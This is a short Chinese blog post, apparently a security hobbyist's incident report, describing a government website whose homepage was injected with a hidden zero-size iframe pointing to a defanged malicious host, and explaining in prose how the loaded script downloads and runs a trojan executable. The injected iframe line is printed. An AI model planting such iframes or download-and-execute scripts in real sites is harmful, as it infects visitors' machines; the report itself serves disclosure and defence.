又一个下载恶意文件的政府网站
来源:互联网 发布:关于工业大数据的书籍 编辑:程序博客网 时间:2024/05/01 21:35
endurer 原创
2006-08-22 第1版
首页有3处地方被加入:
/--------
<iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"></iframe>
--------/
hxxp://***object.cnic**b.com/15 的内容为插入许多空格的JavaScript脚本,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 hxxp://***object.cnic**b.com/15/du.exe, 保存为 IE临时文件夹中的 test.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
du.exe 采用 nSPack 1.3 加壳。Kaspersky 报为 Trojan-Downloader.Win32.Delf.aul。
- 又一个下载恶意文件的政府网站
- 又一个自动下载病毒的政府网站(第3版)
- 又一个带毒的政府网站(第3版)
- 又一个被挂木马的政府网站(第3版)
- 两个会自动下载恶意程序文件的政府网站
- 两个下载恶意程序文件的政府网站换花样了
- 某政府网站被加入自动下载病毒文件的代码(第3版)
- 一个会下载 Trojan.DL.Agent.wzr 的政府网站
- 某政府网站被加入的自动下载病毒文件的代码变了花样(第3版)
- 某政府网站被加入的自动下载病毒文件的代码再创新花样(第1版)
- 对政府网站的建议
- 国外政府网站的特点
- 七台河政府网站的陷落
- [09-06] 又一个下载木马的网站(第2版)
- 下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站
- 利用Host文件屏蔽恶意网站
- 又一个大神写的下载效果
- 下载dll文件的网站
- 我的MSN空间停止更新!转向CSDN!
- my J2ME环境搭建
- 暗夜
- 孙鑫VC学习笔记:第十七讲 用邮槽实现进程间的通信
- 给blog加上在线聊天功能
- 又一个下载恶意文件的政府网站
- 缺陷管理系统EoodaBMS V1.3.0822
- 今天22号..呵呵 网站大体框架做完了。。
- EODA.For.Oracle.V1.5.0719
- web开发中的缓存问题的研究(三)
- 如何在 Visual C++.NET 2003 下编译eMule
- web开发中的缓存问题的研究(二)
- Cross site script
- ping